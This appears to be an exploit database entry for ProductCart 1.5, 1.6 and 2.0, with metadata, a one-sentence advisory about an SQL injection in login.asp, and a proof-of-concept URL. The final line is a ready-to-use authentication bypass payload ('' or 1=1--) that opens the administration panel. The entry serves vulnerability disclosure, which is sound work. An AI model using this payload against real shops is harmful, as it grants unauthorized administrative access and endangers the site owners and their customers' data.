ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection

Author: Bosen
type: webapps
platform: asp
port: 
date_added: 2003-07-04 
date_updated: 2012-11-21 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/8105/info

ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to bypass the ProductCart authentication system and access the ProductCart administration panel; other attacks may also be possible.

http://www.example.com/produccart/pdacmin/login.asp?idadmin='' or 1=1--